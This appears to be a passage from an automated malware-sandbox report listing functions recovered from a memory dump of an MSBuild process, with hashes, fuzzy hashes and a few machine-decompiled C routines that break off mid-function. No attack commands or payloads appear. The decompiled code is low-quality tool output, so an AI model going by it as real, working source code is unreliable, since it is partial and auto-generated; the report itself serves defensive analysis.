                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_3_2_1080000_MSBuild.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: a6fd6ef2aa3f7b5b3783548bb903bc8ecf04ea6513814344e7ac5cf782aab666
                                                                                                • Instruction ID: 00d211200f2e900435c5fc1acf0ea486f54e8b0c4cd82a83dadcf37707534318
                                                                                                • Opcode Fuzzy Hash: a6fd6ef2aa3f7b5b3783548bb903bc8ecf04ea6513814344e7ac5cf782aab666
                                                                                                • Instruction Fuzzy Hash: C29002A1601145434540B19988055065115B7E1341392C125A18445A0CC6A88855B3E5
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Function 010E98A0 Relevance: .0, Instructions: 4COMMON
                                                                                                Download Yara Rule
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000003.00000002.486523240.0000000001080000.00000040.00000800.00020000.00000000.sdmp, Offset: 01080000, based on PE: true
                                                                                                • Associated: 00000003.00000002.488171763.000000000119B000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 00000003.00000002.488192191.000000000119F000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_3_2_1080000_MSBuild.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: e3f1a4cf4b28349a2a3869ce9b75b336c74fc8a45d0b33e60f3e05767fcae3fd
                                                                                                • Instruction ID: 4430fefe24b3b1f89df36f08f6926979567cb918fb9e7e5baa5fb91a2fe9ca5f
                                                                                                • Opcode Fuzzy Hash: e3f1a4cf4b28349a2a3869ce9b75b336c74fc8a45d0b33e60f3e05767fcae3fd
                                                                                                • Instruction Fuzzy Hash: 0D90026130100902D102619984157060109E7D1385F92C016E2814595DC6658953B2B2
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Function 010E9B00 Relevance: .0, Instructions: 4COMMON
                                                                                                Download Yara Rule
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000003.00000002.486523240.0000000001080000.00000040.00000800.00020000.00000000.sdmp, Offset: 01080000, based on PE: true
                                                                                                • Associated: 00000003.00000002.488171763.000000000119B000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 00000003.00000002.488192191.000000000119F000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_3_2_1080000_MSBuild.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: 47945e30a175ccd8176516cbd12c615798fafeb9cbba029adfa255a98a08e2cc
                                                                                                • Instruction ID: 091871aa89965484ebe5e33c0559ccb42dd3d24e2f258bb87556cefaa11214d7
                                                                                                • Opcode Fuzzy Hash: 47945e30a175ccd8176516cbd12c615798fafeb9cbba029adfa255a98a08e2cc
                                                                                                • Instruction Fuzzy Hash: 5190026124100D02D1407199C4157070106E7D0641F52C015A1414594DC656896577F1
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Function 010EA3B0 Relevance: .0, Instructions: 4COMMON
                                                                                                Download Yara Rule
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000003.00000002.486523240.0000000001080000.00000040.00000800.00020000.00000000.sdmp, Offset: 01080000, based on PE: true
                                                                                                • Associated: 00000003.00000002.488171763.000000000119B000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 00000003.00000002.488192191.000000000119F000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_3_2_1080000_MSBuild.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: 9a409db48e49aa3dd614690a14819f0a0ffb1d192119964b24647ea654c63f7d
                                                                                                • Instruction ID: 4fe98a8bb8df7c49e5b34955b7c1309b862348cac16811058487284226491440
                                                                                                • Opcode Fuzzy Hash: 9a409db48e49aa3dd614690a14819f0a0ffb1d192119964b24647ea654c63f7d
                                                                                                • Instruction Fuzzy Hash: 0D90027120144502D1407199C44570B5105B7E0341F52C415E1815594CC6558856B3A1
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Function 010E9A10 Relevance: .0, Instructions: 4COMMON
                                                                                                Download Yara Rule
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000003.00000002.486523240.0000000001080000.00000040.00000800.00020000.00000000.sdmp, Offset: 01080000, based on PE: true
                                                                                                • Associated: 00000003.00000002.488171763.000000000119B000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 00000003.00000002.488192191.000000000119F000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_3_2_1080000_MSBuild.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: b577b6fb549b55a3147863484acc7dbb883e416c5734ed44c9c8d54f14504bc1
                                                                                                • Instruction ID: 0e803e749487f9c3b1ac7a628776cf750c017d43586750616e737c96d4b4d18b
                                                                                                • Opcode Fuzzy Hash: b577b6fb549b55a3147863484acc7dbb883e416c5734ed44c9c8d54f14504bc1
                                                                                                • Instruction Fuzzy Hash: 9090027120140902D100619988097470105A7D0342F52C015A6554595EC6A5C89176B1
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Function 010E9A80 Relevance: .0, Instructions: 4COMMON
                                                                                                Download Yara Rule
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000003.00000002.486523240.0000000001080000.00000040.00000800.00020000.00000000.sdmp, Offset: 01080000, based on PE: true
                                                                                                • Associated: 00000003.00000002.488171763.000000000119B000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 00000003.00000002.488192191.000000000119F000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_3_2_1080000_MSBuild.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: d6d6dbc99669e0966f1728620f7cb0808bf59dd943058fc1c413acbcf9bd20e6
                                                                                                • Instruction ID: 51dc996a437c12501c691cb67b638a390177e419b9dbc9baae0befbb1e7f41b1
                                                                                                • Opcode Fuzzy Hash: d6d6dbc99669e0966f1728620f7cb0808bf59dd943058fc1c413acbcf9bd20e6
                                                                                                • Instruction Fuzzy Hash: A990026120144942D14062998805B0F4205A7E1242F92C01DA5546594CC955885577A1
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Function 010E9520 Relevance: .0, Instructions: 4COMMONLIBRARYCODE
                                                                                                Download Yara Rule
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000003.00000002.486523240.0000000001080000.00000040.00000800.00020000.00000000.sdmp, Offset: 01080000, based on PE: true
                                                                                                • Associated: 00000003.00000002.488171763.000000000119B000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 00000003.00000002.488192191.000000000119F000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_3_2_1080000_MSBuild.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: d69fda09d965fcbba221694bab45074eef6e48f46ae2ebee3d5e997cbb9b3bd0
                                                                                                • Instruction ID: ace80cc78a14f91f0e43a717f7658dbcd7b5a6d2d8bf979b392da8b342a7e82d
                                                                                                • Opcode Fuzzy Hash: d69fda09d965fcbba221694bab45074eef6e48f46ae2ebee3d5e997cbb9b3bd0
                                                                                                • Instruction Fuzzy Hash: A09002E1201145924500A299C405B0A4605A7E0241B52C01AE24445A0CC5658851B2B5
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Function 010EAD30 Relevance: .0, Instructions: 4COMMON
                                                                                                Download Yara Rule
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000003.00000002.486523240.0000000001080000.00000040.00000800.00020000.00000000.sdmp, Offset: 01080000, based on PE: true
                                                                                                • Associated: 00000003.00000002.488171763.000000000119B000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 00000003.00000002.488192191.000000000119F000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_3_2_1080000_MSBuild.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: fb08f8031fdaec06a803aae062d0e33a73869d0224b69cbec39ebfca71e9c5f2
                                                                                                • Instruction ID: 1bb5109fb0238fcd5016d780313281ba25e326f1b8a274eeb10cd206c55ce937
                                                                                                • Opcode Fuzzy Hash: fb08f8031fdaec06a803aae062d0e33a73869d0224b69cbec39ebfca71e9c5f2
                                                                                                • Instruction Fuzzy Hash: C9900271A05005129140719988157464106B7E0781B56C015A1904594CC9948A5573E1
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Function 010E9560 Relevance: .0, Instructions: 4COMMON
                                                                                                Download Yara Rule
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000003.00000002.486523240.0000000001080000.00000040.00000800.00020000.00000000.sdmp, Offset: 01080000, based on PE: true
                                                                                                • Associated: 00000003.00000002.488171763.000000000119B000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 00000003.00000002.488192191.000000000119F000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_3_2_1080000_MSBuild.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: 3a488c02ea80746c4d3bd79aee951339fa9d66cb286c3c1fc56478ee8471c2e5
                                                                                                • Instruction ID: d25e56dfd47397c43ec8d2c0740713f930d8be3ce13c5c169488226fc7444005
                                                                                                • Opcode Fuzzy Hash: 3a488c02ea80746c4d3bd79aee951339fa9d66cb286c3c1fc56478ee8471c2e5
                                                                                                • Instruction Fuzzy Hash: 63900265221005020145A599460560B0545B7D6391392C019F28065D0CC661886573A1
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Function 010E95F0 Relevance: .0, Instructions: 4COMMON
                                                                                                Download Yara Rule
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000003.00000002.486523240.0000000001080000.00000040.00000800.00020000.00000000.sdmp, Offset: 01080000, based on PE: true
                                                                                                • Associated: 00000003.00000002.488171763.000000000119B000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 00000003.00000002.488192191.000000000119F000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_3_2_1080000_MSBuild.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: d1b2d3c58ed71a15381dad4faf62cfd3b138be1174b4ec3472e5ee9129f24831
                                                                                                • Instruction ID: 3ec002f449e62f49ec5e47bd2b2bd48c930666cf359ff299f2bf95400ec87e7d
                                                                                                • Opcode Fuzzy Hash: d1b2d3c58ed71a15381dad4faf62cfd3b138be1174b4ec3472e5ee9129f24831
                                                                                                • Instruction Fuzzy Hash: 2090027120100D02D104619988057860105A7D0341F52C015A7414695ED6A5889172B1
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Function 010EA710 Relevance: .0, Instructions: 4COMMON
                                                                                                Download Yara Rule
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000003.00000002.486523240.0000000001080000.00000040.00000800.00020000.00000000.sdmp, Offset: 01080000, based on PE: true
                                                                                                • Associated: 00000003.00000002.488171763.000000000119B000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 00000003.00000002.488192191.000000000119F000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_3_2_1080000_MSBuild.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: bce15732446768898e2b6387ddde6c822aafeaf03f4db7ca8c06f809133fc1e5
                                                                                                • Instruction ID: dd5863d5ee3c1f87b7660304a636173b586c1ec6564764f9db02e25952c89164
                                                                                                • Opcode Fuzzy Hash: bce15732446768898e2b6387ddde6c822aafeaf03f4db7ca8c06f809133fc1e5
                                                                                                • Instruction Fuzzy Hash: 6C900271301005529500A6D99805B4A4205A7F0341B52D019A5404594CC594886172A1
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Function 010E9730 Relevance: .0, Instructions: 4COMMON
                                                                                                Download Yara Rule
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000003.00000002.486523240.0000000001080000.00000040.00000800.00020000.00000000.sdmp, Offset: 01080000, based on PE: true
                                                                                                • Associated: 00000003.00000002.488171763.000000000119B000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 00000003.00000002.488192191.000000000119F000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_3_2_1080000_MSBuild.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: 692349964be768f512986bc0a121fd0f2726c97fad5dffc07483cf5ddbc992df
                                                                                                • Instruction ID: e1daaaa6ae34c4ab2e49a72ee5451306dd25d37c83844311ea8b9398603049dc
                                                                                                • Opcode Fuzzy Hash: 692349964be768f512986bc0a121fd0f2726c97fad5dffc07483cf5ddbc992df
                                                                                                • Instruction Fuzzy Hash: A590026160500902D140719994197060115A7D0241F52D015A1414594DC6998A5577E1
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Function 010E9760 Relevance: .0, Instructions: 4COMMON
                                                                                                Download Yara Rule
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000003.00000002.486523240.0000000001080000.00000040.00000800.00020000.00000000.sdmp, Offset: 01080000, based on PE: true
                                                                                                • Associated: 00000003.00000002.488171763.000000000119B000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 00000003.00000002.488192191.000000000119F000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_3_2_1080000_MSBuild.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: bdd85ba1390e17a36ff7d7cf1b459ab758a3a8c2e7130f458c8e8cbc65920af2
                                                                                                • Instruction ID: 35d8f9c49fcb8d2c4c17cea0f3b68b4eeaad5e7febc8f8e46073a0e7dbc32c77
                                                                                                • Opcode Fuzzy Hash: bdd85ba1390e17a36ff7d7cf1b459ab758a3a8c2e7130f458c8e8cbc65920af2
                                                                                                • Instruction Fuzzy Hash: 5390027120100903D100619995097070105A7D0241F52D415A1814598DD696885172A1
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Function 010EA770 Relevance: .0, Instructions: 4COMMON
                                                                                                Download Yara Rule
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000003.00000002.486523240.0000000001080000.00000040.00000800.00020000.00000000.sdmp, Offset: 01080000, based on PE: true
                                                                                                • Associated: 00000003.00000002.488171763.000000000119B000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 00000003.00000002.488192191.000000000119F000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_3_2_1080000_MSBuild.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: 6efa951097d595c369b1e0b69edddeaeea343143da18b621defdb16f34b2c7b4
                                                                                                • Instruction ID: bfb75eb89c7241d822ea86b723cdd841db3b5634206468e23a58ea354a7849d3
                                                                                                • Opcode Fuzzy Hash: 6efa951097d595c369b1e0b69edddeaeea343143da18b621defdb16f34b2c7b4
                                                                                                • Instruction Fuzzy Hash: 5890027520504942D50065999805B870105A7D0345F52D415A18145DCDC6948861B2A1
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Function 010E9770 Relevance: .0, Instructions: 4COMMON
                                                                                                Download Yara Rule
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000003.00000002.486523240.0000000001080000.00000040.00000800.00020000.00000000.sdmp, Offset: 01080000, based on PE: true
                                                                                                • Associated: 00000003.00000002.488171763.000000000119B000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 00000003.00000002.488192191.000000000119F000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_3_2_1080000_MSBuild.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: 29809f11b5fe64b9fda7cef15cbad2478cdfc386bbd697ed67096fdf28a98789
                                                                                                • Instruction ID: cd3c15ab745898d71d8b2ac4a7f08bf66e1fb53220ba3f11144ea9e2c1b22486
                                                                                                • Opcode Fuzzy Hash: 29809f11b5fe64b9fda7cef15cbad2478cdfc386bbd697ed67096fdf28a98789
                                                                                                • Instruction Fuzzy Hash: 9290026120504942D10065999409B060105A7D0245F52D015A24545D5DC6758851B2B1
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Function 010E9610 Relevance: .0, Instructions: 4COMMON
                                                                                                Download Yara Rule
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000003.00000002.486523240.0000000001080000.00000040.00000800.00020000.00000000.sdmp, Offset: 01080000, based on PE: true
                                                                                                • Associated: 00000003.00000002.488171763.000000000119B000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 00000003.00000002.488192191.000000000119F000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_3_2_1080000_MSBuild.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: 5f4e276c46b9e66858750de29ce575ea3af428e6bd6fd9f07c2753844f7266f6
                                                                                                • Instruction ID: e0c81ffae717a68de9079fb9a8ac687fc0424bde2de907ad0326d6d12474f2f8
                                                                                                • Opcode Fuzzy Hash: 5f4e276c46b9e66858750de29ce575ea3af428e6bd6fd9f07c2753844f7266f6
                                                                                                • Instruction Fuzzy Hash: 7890027160500D02D150719984157460105A7D0341F52C015A1414694DC7958A5577E1
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Function 010E9650 Relevance: .0, Instructions: 4COMMON
                                                                                                Download Yara Rule
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000003.00000002.486523240.0000000001080000.00000040.00000800.00020000.00000000.sdmp, Offset: 01080000, based on PE: true
                                                                                                • Associated: 00000003.00000002.488171763.000000000119B000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 00000003.00000002.488192191.000000000119F000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_3_2_1080000_MSBuild.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: d5d306e97a306a93c7cb009ee1a78cabf465e8f2dd49fa91019148031c5715fd
                                                                                                • Instruction ID: d078444510bf5e8258fd3dfeb7cd2f0a1c6dc44e6379b09204a2211d8bdd5b29
                                                                                                • Opcode Fuzzy Hash: d5d306e97a306a93c7cb009ee1a78cabf465e8f2dd49fa91019148031c5715fd
                                                                                                • Instruction Fuzzy Hash: F990027120504D42D14071998405B460115A7D0345F52C015A14546D4DD6658D55B7E1
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Function 010E96D0 Relevance: .0, Instructions: 4COMMON
                                                                                                Download Yara Rule
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000003.00000002.486523240.0000000001080000.00000040.00000800.00020000.00000000.sdmp, Offset: 01080000, based on PE: true
                                                                                                • Associated: 00000003.00000002.488171763.000000000119B000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 00000003.00000002.488192191.000000000119F000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_3_2_1080000_MSBuild.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: 4518ff07ef4e62fa9ee2b760aaa1b8bbf840375e183d34a20e3a6121f06a0e7d
                                                                                                • Instruction ID: b6ff12023a067fc6ebcceb03fd2c5b57cdf277ea4657820e12fe8dc75b2890cf
                                                                                                • Opcode Fuzzy Hash: 4518ff07ef4e62fa9ee2b760aaa1b8bbf840375e183d34a20e3a6121f06a0e7d
                                                                                                • Instruction Fuzzy Hash: 5B90027120100D42D10061998405B460105A7E0341F52C01AA1514694DC655C85176A1
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Function 010E9670 Relevance: .0, Instructions: 2COMMONLIBRARYCODE
                                                                                                Download Yara Rule
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000003.00000002.486523240.0000000001080000.00000040.00000800.00020000.00000000.sdmp, Offset: 01080000, based on PE: true
                                                                                                • Associated: 00000003.00000002.488171763.000000000119B000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 00000003.00000002.488192191.000000000119F000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_3_2_1080000_MSBuild.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: a3d3d3c0123cddb368cc51eab9da9c3aaeeac76cd7bbfae310620ba6f7f49b43
                                                                                                • Instruction ID: ac3007332ac9e9c7c3def3549d4ebd9487e85b8eda7bba198d1977444ceafe38
                                                                                                • Opcode Fuzzy Hash: a3d3d3c0123cddb368cc51eab9da9c3aaeeac76cd7bbfae310620ba6f7f49b43
                                                                                                • Instruction Fuzzy Hash:
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Function 010D645B Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 109timeCOMMON
                                                                                                Download Yara Rule
                                                                                                C-Code - Quality: 26%
                                                                                                			E010D645B(void* __ecx, intOrPtr __edx, intOrPtr _a4) {
				signed int _v8;
				void* _v36;
				intOrPtr _v48;
				intOrPtr _v52;
				intOrPtr _v56;
				char _v60;
				char _v64;
				intOrPtr _v68;
				intOrPtr _v72;
				intOrPtr _v76;
				intOrPtr _v80;
				void* __ebx;
				void* __edi;
				void* __esi;
				intOrPtr _t48;
				intOrPtr _t49;
				intOrPtr _t50;
				intOrPtr* _t52;
				char _t56;
				void* _t69;
				char _t72;
				void* _t73;
				intOrPtr _t75;
				intOrPtr _t79;
				void* _t82;
				void* _t84;
				intOrPtr _t86;
				void* _t88;
				signed int _t90;
				signed int _t92;
				signed int _t93;

				_t80 = __edx;
				_t92 = (_t90 & 0xfffffff8) - 0x4c;
				_v8 =  *0x119d360 ^ _t92;
				_t72 = 0;
				_v72 = __edx;
				_t82 = __ecx;
				_t86 =  *((intOrPtr*)(__edx + 0xc8));
				_v68 = _t86;
				E010EFA60( &_v60, 0, 0x30);
				_t48 =  *((intOrPtr*)(_t82 + 0x70));
				_t93 = _t92 + 0xc;
				_v76 = _t48;
				_t49 = _t48;
				if(_t49 == 0) {
					_push(5);
					 *((char*)(_t82 + 0x6a)) = 0;
					 *((intOrPtr*)(_t82 + 0x6c)) = 0;
					goto L3;
				} else {
					_t69 = _t49 - 1;
					if(_t69 != 0) {
						if(_t69 == 1) {
							_push(0xa);
							goto L3;
						} else {
							_t56 = 0;
						}
					} else {
						_push(4);
						L3:
						_pop(_t50);
						_v80 = _t50;
						if(_a4 == _t72 && _t86 != 0 && _t50 != 0xa &&  *((char*)(_t82 + 0x6b)) == 1) {
							E010C2280(_t50, _t86 + 0x1c);
							_t79 = _v72;
							 *((intOrPtr*)(_t79 + 0x20)) =  *((intOrPtr*)( *[fs:0x18] + 0x24));
							 *((intOrPtr*)(_t79 + 0x88)) =  *((intOrPtr*)(_t82 + 0x68));
							 *((intOrPtr*)(_t79 + 0x8c)) =  *((intOrPtr*)(_t82 + 0x6c));
							 *((intOrPtr*)(_t79 + 0x90)) = _v80;
							 *((intOrPtr*)(_t79 + 0x20)) = _t72;
							E010BFFB0(_t72, _t82, _t86 + 0x1c);
						}
						_t75 = _v80;
						_t52 =  *((intOrPtr*)(_v72 + 0x20));
						_t80 =  *_t52;
						_v72 =  *((intOrPtr*)(_t52 + 4));
						_v52 =  *((intOrPtr*)(_t82 + 0x68));
						_v60 = 0x30;
						_v56 = _t75;
						_v48 =  *((intOrPtr*)(_t82 + 0x6c));
						asm("movsd");
						_v76 = _t80;
						_v64 = 0x30;
						asm("movsd");
						asm("movsd");
						asm("movsd");
						if(_t80 != 0) {
							 *0x119b1e0(_t75, _v72,  &_v64,  &_v60);
							_t72 = _v76();
						}
						_t56 = _t72;
					}
				}
				_pop(_t84);
				_pop(_t88);
				_pop(_t73);
				return E010EB640(_t56, _t73, _v8 ^ _t93, _t80, _t84, _t88);
			}


































                                                                                                0x010d645b
                                                                                                0x010d6463
                                                                                                0x010d646d
                                                                                                0x010d6475
                                                                                                0x010d647a
                                                                                                0x010d647e
                                                                                                0x010d6480
                                                                                                0x010d648c
                                                                                                0x010d6490
                                                                                                0x010d6495
                                                                                                0x010d6498
                                                                                                0x010d649b
                                                                                                0x010d649f
                                                                                                0x010d64a1
                                                                                                0x01117c07
                                                                                                0x01117c09
                                                                                                0x01117c0c
                                                                                                0x00000000
                                                                                                0x010d64a7
                                                                                                0x010d64a7
                                                                                                0x010d64aa
                                                                                                0x01117bf7
                                                                                                0x01117c00
                                                                                                0x00000000
                                                                                                0x01117bf9
                                                                                                0x01117bf9
                                                                                                0x01117bf9
                                                                                                0x010d64b0
                                                                                                0x010d64b0
                                                                                                0x010d64b2
                                                                                                0x010d64b2
                                                                                                0x010d64b3
                                                                                                0x010d64ba
                                                                                                0x010d6553
                                                                                                0x010d655e
                                                                                                0x010d6566
                                                                                                0x010d656c
                                                                                                0x010d6575
                                                                                                0x010d657f
                                                                                                0x010d6585
                                                                                                0x010d6588
                                                                                                0x010d6588
                                                                                                0x010d64c7
                                                                                                0x010d64cb
                                                                                                0x010d64ce
                                                                                                0x010d64d3
                                                                                                0x010d64da
                                                                                                0x010d64e5
                                                                                                0x010d64ed
                                                                                                0x010d64f1
                                                                                                0x010d64f5
                                                                                                0x010d64f6
                                                                                                0x010d64fa
                                                                                                0x010d6502
                                                                                                0x010d6503
                                                                                                0x010d6504
                                                                                                0x010d6507
                                                                                                0x010d651a
                                                                                                0x010d6524
                                                                                                0x010d6524
                                                                                                0x010d6526
                                                                                                0x010d6526
                                                                                                0x010d64aa
                                                                                                0x010d652c
                                                                                                0x010d652d
                                                                                                0x010d652e
                                                                                                0x010d6539

                                                                                                APIs
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000003.00000002.486523240.0000000001080000.00000040.00000800.00020000.00000000.sdmp, Offset: 01080000, based on PE: true
                                                                                                • Associated: 00000003.00000002.488171763.000000000119B000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 00000003.00000002.488192191.000000000119F000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_3_2_1080000_MSBuild.jbxd
                                                                                                Similarity
                                                                                                • API ID: DebugPrintTimes
                                                                                                • String ID: 0$0
                                                                                                • API String ID: 3446177414-203156872
                                                                                                • Opcode ID: ca3a8fea623f1ebb921c8f767a0fd61af4275f91015eea55e06a8e35e13d93b6
                                                                                                • Instruction ID: a75845dc018cf1cffa3f125f9f06e4d0af65eaee90eb654a5a0c017c028be8ee
                                                                                                • Opcode Fuzzy Hash: ca3a8fea623f1ebb921c8f767a0fd61af4275f91015eea55e06a8e35e13d93b6
                                                                                                • Instruction Fuzzy Hash: 77415AB16087069FC351CF28C484A5ABBE5BB89714F044A6EF988DB341D732EA45CB86
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Function 0113FDDA Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 42COMMON
                                                                                                Download Yara Rule
                                                                                                C-Code - Quality: 53%
                                                                                                			E0113FDDA(intOrPtr* __edx, intOrPtr _a4) {
				void* _t7;
				intOrPtr _t9;
				intOrPtr _t10;
				intOrPtr* _t12;
				intOrPtr* _t13;
				intOrPtr _t14;
				intOrPtr* _t15;

